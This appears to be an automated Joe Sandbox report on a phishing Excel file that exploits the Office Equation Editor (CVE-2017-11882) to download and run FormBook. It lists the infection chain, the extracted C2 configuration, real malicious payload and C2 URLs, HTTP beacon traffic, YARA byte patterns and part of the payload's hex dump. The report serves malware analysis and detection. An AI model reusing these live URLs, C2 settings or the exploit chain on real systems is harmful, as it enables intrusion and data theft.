Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report New order - C.S.I No. 04183.xlsx

Overview

General Information

Sample Name:New order - C.S.I No. 04183.xlsx
Analysis ID:528788
MD5:bc2d171f6ea23a58ce5cca820869295c
SHA1:dafd3a3276c12ee6d20206573d65d6fb10e6af7b
SHA256:408c41f67cc40208f1518b050db8b6d0f315dae817e26c5ae43efe917506c226
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1912 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2680 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2868 cmdline: "C:\Users\Public\vbc.exe" MD5: 4D1B51FE258BE32D346B3507ABEDDCB3)
      • vbc.exe (PID: 1292 cmdline: "C:\Users\Public\vbc.exe" MD5: 4D1B51FE258BE32D346B3507ABEDDCB3)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cscript.exe (PID: 2216 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
            • cmd.exe (PID: 772 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.celikkaya.xyz/og2w/"], "decoy": ["drivenexpress.info", "pdfproxy.com", "zyz999.top", "oceanserver1.com", "948289.com", "nubilewoman.com", "ibizadiamonds.com", "bosniantv-australia.com", "juliehutzell.com", "poshesocial.events", "icsrwk.xyz", "nap-con.com", "womansslippers.com", "invictusfarm.com", "search-panel-avg-rock.rest", "desencriptar.com", "imperialexoticreptiles.com", "agastify.com", "strinvstr.com", "julianapeloi.com", "myproperty99.com", "mahardikasantoso.com", "pathway-strategies.com", "runbusinessonline.com", "facenbook.xyz", "texasschnauzer.com", "whoyummy.top", "hiscomsvc.com", "644557.com", "shouyeshow.com", "emtek.site", "inspireabossglobal.us", "sellmyhouse365.net", "ambergrids.xyz", "shoptrendyshop.com", "b7eb8.com", "crystalsbyzoe.com", "awfullive.site", "rebelgreens.com", "depressiqwidv.xyz", "mvp69bet.com", "selectedandprotected.com", "china-jiahe.com", "brandonknicely.com", "redrodventuresllc.com", "tomafer.net", "makemeorgasm.net", "wihomeoffers.com", "bamko.link", "secure-01.net", "fridayhabit.com", "mudeevehkuwpitcicet.site", "inversioneskomp.com", "oojry.xyz", "jibony.com", "cellphoneplansiusaweb.com", "lianemuhill.com", "caroeventos.com", "thucphamsachkhaihuy.com", "musicjem.com", "hbbtv.xyz", "meltemilebaskalasim.com", "xn--38j0b6c.com", "checkupfromtheneckup.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.2980000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.2980000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 27 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.171.1.140, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2680, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2680, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2680, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2868
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2680, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2868

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.celikkaya.xyz/og2w/"], "decoy": ["drivenexpress.info", "pdfproxy.com", "zyz999.top", "oceanserver1.com", "948289.com", "nubilewoman.com", "ibizadiamonds.com", "bosniantv-australia.com", "juliehutzell.com", "poshesocial.events", "icsrwk.xyz", "nap-con.com", "womansslippers.com", "invictusfarm.com", "search-panel-avg-rock.rest", "desencriptar.com", "imperialexoticreptiles.com", "agastify.com", "strinvstr.com", "julianapeloi.com", "myproperty99.com", "mahardikasantoso.com", "pathway-strategies.com", "runbusinessonline.com", "facenbook.xyz", "texasschnauzer.com", "whoyummy.top", "hiscomsvc.com", "644557.com", "shouyeshow.com", "emtek.site", "inspireabossglobal.us", "sellmyhouse365.net", "ambergrids.xyz", "shoptrendyshop.com", "b7eb8.com", "crystalsbyzoe.com", "awfullive.site", "rebelgreens.com", "depressiqwidv.xyz", "mvp69bet.com", "selectedandprotected.com", "china-jiahe.com", "brandonknicely.com", "redrodventuresllc.com", "tomafer.net", "makemeorgasm.net", "wihomeoffers.com", "bamko.link", "secure-01.net", "fridayhabit.com", "mudeevehkuwpitcicet.site", "inversioneskomp.com", "oojry.xyz", "jibony.com", "cellphoneplansiusaweb.com", "lianemuhill.com", "caroeventos.com", "thucphamsachkhaihuy.com", "musicjem.com", "hbbtv.xyz", "meltemilebaskalasim.com", "xn--38j0b6c.com", "checkupfromtheneckup.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: New order - C.S.I No. 04183.xlsxVirustotal: Detection: 36%Perma Link
          Source: New order - C.S.I No. 04183.xlsxReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://103.171.1.140/384500000_1/.vbc.exeAvira URL Cloud: Label: malware
          Source: http://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MNAvira URL Cloud: Label: phishing
          Multi AV Scanner detection for domain / URLShow sources
          Source: http://103.171.1.140/384500000_1/.vbc.exeVirustotal: Detection: 8%Perma Link
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dllJoe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.2980000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cscript.exe.3e22f0.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 5.0.vbc.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cscript.exe.2a4f840.7.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.0.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.459887685.00000000002B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495263706.00000000008C0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.460925066.00000000005B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000003.494990015.00000000004B0000.00000004.00000001.sdmp, cscript.exe, 00000007.00000002.663624666.0000000002490000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.495952417.0000000002180000.00000004.00000001.sdmp
          Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
          Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00405250
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C22 FindFirstFileA,FindClose,4_2_00405C22
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,4_2_00402630
          Source: global trafficDNS query: name: www.oojry.xyz
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_00416CDC
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_1_00416CDC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi7_2_00086CDC
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.171.1.140:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.171.1.140:80

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.82.75 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oojry.xyz
          Source: C:\Windows\explorer.exeDomain query: www.crystalsbyzoe.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.246.239.131 80Jump to behavior
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.oojry.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.celikkaya.xyz/og2w/
          Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.oojry.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.crystalsbyzoe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:23:23 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Thu, 25 Nov 2021 04:13:29 GMTETag: "7431e-5d195326272a0"Accept-Ranges: bytesContent-Length: 475934Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 70 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 70 a0 02 00 00 70 03 00 00 a2 02 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /384500000_1/.vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.171.1.140Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlDate: Thu, 25 Nov 2021 18:25:03 GMTServer: nginxVary: Accept-EncodingContent-Length: 159Connection: CloseData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.17.8.2</center></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
          Source: unknownTCP traffic detected without corresponding DNS query: 103.171.1.140
